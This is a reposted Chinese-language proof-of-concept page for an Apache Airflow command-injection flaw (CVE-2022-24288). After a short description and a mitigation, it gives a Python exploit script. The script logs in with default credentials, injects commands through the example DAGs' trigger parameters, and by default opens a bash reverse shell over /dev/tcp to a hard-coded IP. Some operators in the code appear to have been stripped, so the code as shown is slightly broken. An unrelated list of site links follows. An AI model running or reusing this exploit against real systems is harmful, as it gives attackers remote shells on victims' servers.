CVE-2022-24288 Apache Airflow RCE POC/EXP
一、描述
在 Apache Airflow 2.2.4 之前的版本中,一些示例 DAG 没有正确清理用户提供的参数,使其容易受到来自 Web UI 的 OS 命令注入的影响。
二、缓解:
这可以通过确保[core] load_examples
设置为来缓解False
。
三、 EXP
(payload1 2是俩个不同利用点,选择用一个就行)
-
import requests
-
import re
-
import random
-
-
proxy = {
-
"http": "http://127.0.0.1:8080",
-
"https": "https://127.0.0.1:8080"
-
}
-
-
def dl(url, user, pwd):
-
urls = url '/login/?next=' url '/home'
-
rep = requests.get(url)
-
session = rep.headers['Set-Cookie'].split()[0].replace(';', '')
-
csrf = re.findall(r"var csrfToken = '(. ?)'", rep.text)[0]
-
headers = {
-
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
-
"Chrome/99.0.4844.84 Safari/537.36",
-
"Cookie": session
-
}
-
data = {
-
'csrf_token': csrf,
-
'username': user,
-
'password': pwd
-
}
-
reps = requests.post(urls, data=data, headers=headers)
-
s1 = reps.headers['Set-Cookie'].split()[0].replace(';', '')
-
c1 = re.findall(r"var csrfToken = '(. ?)'", reps.text)[0]
-
return s1, c1
-
-
-
def payload1(urll, sess, csrf, cmd):
-
urls = urll '/trigger?dag_id=example_passing_params_via_test_command'
-
code1 = random.randint(0, 60)
-
dates = '2022-04-02 09:88:31 00:00'
-
dates1 = dates.replace('88', str(code1))
-
-
cmds = '{"foo":"\\";' cmd ';\\""}'
-
headers = {
-
"Content-Type": "application/x-www-form-urlencoded",
-
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36",
-
"Accept": "text/html",
-
"Cookie": sess,
-
}
-
print(dates1)
-
-
data = {
-
'csrf_token': csrf,
-
'dag_id': 'example_passing_params_via_test_command',
-
'origin': '/home',
-
'execution_date': dates1,
-
'conf': cmds,
-
'unpause': 'on'
-
}
-
-
rep = requests.post(urls, data=data, headers=headers, proxies=proxy)
-
print(rep.status_code)
-
-
-
def payload2(urll, sess, csrf, cmd):
-
urls = urll '/trigger?dag_id=tutorial'
-
code1 = random.randint(0, 60)
-
dates = '2022-04-02 09:88:31 00:00'
-
dates1 = dates.replace('88', str(code1))
-
-
cmds = '{"my_param":"\\";' cmd ';\\""}'
-
headers = {
-
"Content-Type": "application/x-www-form-urlencoded",
-
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36",
-
"Accept": "text/html",
-
"Cookie": sess,
-
}
-
print(dates1)
-
-
data = {
-
'csrf_token': csrf,
-
'dag_id': 'tutorial',
-
'origin': '/home',
-
'execution_date': dates1,
-
'conf': cmds,
-
'unpause': 'on'
-
}
-
-
rep = requests.post(urls, data=data, headers=headers, proxies=proxy)
-
print(rep.status_code)
-
-
-
if __name__ == '__main__':
-
user = 'airflow'
-
pwd = 'airflow'
-
url = input("url __>:")
-
#url = 'http://192.168.153.131:8080'
-
cmd = 'bash -i >& /dev/tcp/192.168.153.131/9999 0>&1'
-
s1, c1 = dl(url, user, pwd)
-
print(f'Command __>: {cmd}')
-
#payload1(url, s1, c1, cmd)
-
payload2(url, s1, c1, cmd)
这篇好文章是转载于:学新通技术网
- 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
- 本站站名: 学新通技术网
- 本文地址: /boutique/detail/tanhhacbbf
系列文章
更多
同类精品
更多
-
photoshop保存的图片太大微信发不了怎么办
PHP中文网 06-15 -
《学习通》视频自动暂停处理方法
HelloWorld317 07-05 -
word里面弄一个表格后上面的标题会跑到下面怎么办
PHP中文网 06-20 -
Android 11 保存文件到外部存储,并分享文件
Luke 10-12 -
photoshop扩展功能面板显示灰色怎么办
PHP中文网 06-14 -
微信公众号没有声音提示怎么办
PHP中文网 03-31 -
excel下划线不显示怎么办
PHP中文网 06-23 -
excel打印预览压线压字怎么办
PHP中文网 06-22 -
TikTok加速器哪个好免费的TK加速器推荐
TK小达人 10-01 -
怎样阻止微信小程序自动打开
PHP中文网 06-13